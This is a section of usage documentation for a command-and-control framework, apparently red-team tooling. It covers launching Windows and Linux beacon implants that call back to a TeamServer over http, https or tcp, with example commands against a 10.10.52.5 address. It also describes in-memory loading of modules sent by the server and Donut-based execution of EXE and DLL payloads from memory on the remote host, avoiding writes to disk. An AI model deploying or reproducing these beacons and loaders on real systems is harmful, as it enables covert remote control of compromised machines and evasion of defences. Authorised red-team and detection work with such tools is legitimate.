5 ‐ Beacon
Windows Beacons and command modules are compiled separately in another project, but a compiled version is provided in WindowsBeacons and WindowsModules to be able to use it directly.
To launch a beacon available in WindowsBeacons use the following syntax on a windows machine:
.\BeaconHttp.exe IP_TEAMSERVER PORT_LISTENER http/https
.\BeaconHttp.exe 10.10.52.5 8443 https
.\BeaconHttp.exe 10.10.52.5 80 http
.\BeaconTcp.exe 10.10.52.5 4444
When the Beacon is started and connect to the TeamServer, a new session is started from where you can interact with the Beacon:
Windows beacon uses primarily windows API and start with no module loaded. Modules are loaded at runtime using "MemoryModule" project to load DLL sent by the TeamServer to the beacon.
AssemblyExec & Inject, that use Donut project, make it possible to launch EXE, DLL, managed or unmanaged directly from memory on the remote host.
Linux Beacons and command modules are compiled separately in another project, but a compiled version is provided in LinuxBeacons and LinuxModules to be able to use it directly. It try to work in a similar fashion as the windows version.
Linux beacon start with no module loaded. Modules are loaded at runtime using "dlopen" to load SO sent by the TeamServer to the beacon, the library are not written to disk but are loaded directly from memory.
To launch a beacon available in LinuxBeacons use the following syntax on a Linux machine:
./BeaconHttp IP_TEAMSERVER PORT_LISTENER http/https
./BeaconHttp 10.10.52.5 8443 https
./BeaconHttp 10.10.52.5 80 http
./BeaconTcp 10.10.52.5 4444
The binary are not statically linked with std so it could fail to start.
